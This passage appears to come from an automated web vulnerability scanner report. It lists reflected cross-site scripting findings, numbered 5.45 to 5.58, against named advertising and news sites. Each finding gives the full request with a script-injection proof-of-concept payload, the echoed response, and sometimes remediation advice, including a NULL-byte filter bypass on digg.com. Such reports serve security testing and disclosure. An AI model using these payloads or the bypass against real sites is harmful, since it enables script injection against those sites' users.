Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A20";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:20 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33182

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
h=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9f2beb<a>113bbd59c6a&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.45. http://control.adap.tv/control [width parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload d751d<a>d95b0125ac7 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300d751d<a>d95b0125ac7&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A08%3A48";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:08:48 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33240

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300d751d<a>d95b0125ac7&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&html
...[SNIP]...

5.46. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00669e1"><script>alert(1)</script>a84c496149e was submitted in the REST URL parameter 1. This input was echoed as 669e1"><script>alert(1)</script>a84c496149e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00669e1"><script>alert(1)</script>a84c496149e HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=1698788 10.2.128.119
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18218

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00669e1"><script>alert(1)</script>a84c496149e.rss">
...[SNIP]...

5.47. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dab5"-alert(1)-"03e4499d471 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=2dab5"-alert(1)-"03e4499d471 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1314978163_34024:68292:2:0:82_34023:68293:1:713:713; uid=1_1314978163_1314893682667:5756480826433243; kwd=1_1314978163; scg=1_1314978163; ppd=1_1314978163; act=1_1314978163

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:21 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097121_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:45:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:45:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 320

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=2dab5"-alert(1)-"03e4499d471' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.48. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bc35"-alert(1)-"27e7e245bd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=&2bc35"-alert(1)-"27e7e245bd2=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1314978163_34024:68292:2:0:82_34023:68293:1:713:713; uid=1_1314978163_1314893682667:5756480826433243; kwd=1_1314978163; scg=1_1314978163; ppd=1_1314978163; act=1_1314978163

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:21 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097121_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:45:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:45:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=&2bc35"-alert(1)-"27e7e245bd2=1' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.49. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43370"-alert(1)-"7ab0ee228a4 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68283&type=lead43370"-alert(1)-"7ab0ee228a4&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1314978163_34024:68292:2:0:82_34023:68293:1:713:713; uid=1_1314978163_1314893682667:5756480826433243; kwd=1_1314978163; scg=1_1314978163; ppd=1_1314978163; act=1_1314978163

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:21 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097121_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:45:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:45:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 320

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead43370"-alert(1)-"7ab0ee228a4&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.50. http://jlinks.industrybrains.com/jsct [ct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 659dc<script>alert(1)</script>9947f6192e1 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING659dc<script>alert(1)</script>9947f6192e1&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:44:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:44:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 88

// Error: Unknown old section REUTERS_INVESTING659dc<script>alert(1)</script>9947f6192e1

5.51. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a25e<script>alert(1)</script>42c1db7433c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp&3a25e<script>alert(1)</script>42c1db7433c=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:44:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:44:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter 3a25e<script>alert(1)</script>42c1db7433c

5.52. http://jlinks.industrybrains.com/jsct [tr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 27fb8<script>alert(1)</script>88ae6a92ca4 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS27fb8<script>alert(1)</script>88ae6a92ca4&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:44:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:44:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 87

// Error: Site 851 has no section NEWS_MARKETS27fb8<script>alert(1)</script>88ae6a92ca4

5.53. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload a66a8<script>alert(1)</script>6d0d8b4836d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J06575a66a8<script>alert(1)</script>6d0d8b4836d HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="...[SNIP]..."

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 04 Sep 2011 00:42:21 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 05 Sep 2011 00:42:21 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:21 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J06575A66A8<SCRIPT>ALERT(1)</SCRIPT>6D0D8B4836D" was not recognized.
*/

5.54. http://js.www.reuters.com/recommend/re/re [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.www.reuters.com
Path:   /recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7ff1c%3balert(1)//79af3901163 was submitted in the callback parameter. This input was echoed as 7ff1c;alert(1)//79af3901163 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendations7ff1c%3balert(1)//79af3901163&ed=us&u=9da0587b-a65b-4bca-a7de-c321e48d355a&refreshUrlTimestamp=1315097078225 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:57:56 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:07:56 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Content-Length: 157

if (typeof Reuters.tns.updateRecommendations7ff1c;alert(1)//79af3901163 === 'function') {Reuters.tns.updateRecommendations7ff1c;alert(1)//79af3901163([]);}

5.55. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14a96'%3balert(1)//3dd8151559d was submitted in the admeld_callback parameter. This input was echoed as 14a96';alert(1)//3dd8151559d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match14a96'%3balert(1)//3dd8151559d HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=e1c22076-53f3-4fd9-8356-2735bf06a66c; segments_p1="eJzjYuHY2M7IxcIx9wojAA9oAtg="; exchange_uid="eyI0IjogWyJDQUVTRVB4NVdCa2dwbTVNQ3pVRHd2TlVDNXciLCA3MzQzODNdfQ=="; partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 01:05:16 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sun, 04-Sep-2011 01:04:56 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 247

document.write('<img width="0" height="0" src="http://tag.admeld.com/match14a96';alert(1)//3dd8151559d?admeld_adprovider_id=300&external_user_id=e1c22076-53f3-4fd9-8356-2735bf06a66c&Expiration=1315530316&custom_user_segments=%2C17329%2C27165"/>
...[SNIP]...

5.56. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9782a"><script>alert(1)</script>8fada19613b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com9782a"><script>alert(1)</script>8fada19613b/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com9782a"><script>alert(1)</script>8fada19613b/ac/377283912/Bottom3/default/empty.gif/4d686437616b35697963454144412f72?x" target="_top">
...[SNIP]...

5.57. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a684b"><script>alert(1)</script>4e0d56cffe6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com/ac@Bottom3a684b"><script>alert(1)</script>4e0d56cffe6 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 329
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com/ac/86271498/Bottom3a684b"><script>alert(1)</script>4e0d56cffe6/default/empty.gif/4d686437616b35697963454144412f72?x" target="_top">
...[SNIP]...

5.58. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75258"><script>alert(1)</script>9210644d738 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=75258"><script>alert(1)</script>9210644d738&sp=y&admeld_call_type=iframe&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
